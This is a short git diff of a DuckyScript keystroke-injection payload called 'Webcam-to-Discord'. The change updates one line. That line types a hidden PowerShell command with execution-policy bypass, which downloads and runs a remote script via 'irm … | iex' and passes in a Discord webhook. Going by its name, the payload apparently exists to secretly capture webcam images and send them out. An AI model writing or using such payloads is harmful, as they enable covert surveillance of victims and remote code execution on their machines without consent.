diff --git a/Webcam-to-Discord/Webcam-to-Discord.txt b/Webcam-to-Discord/Webcam-to-Discord.txt index e64014d..bb76ec0 100644 --- a/Webcam-to-Discord/Webcam-to-Discord.txt +++ b/Webcam-to-Discord/Webcam-to-Discord.txt @@ -12,7 +12,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bwcamtodc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm https://bw0.cc/dcwc | iex ENTER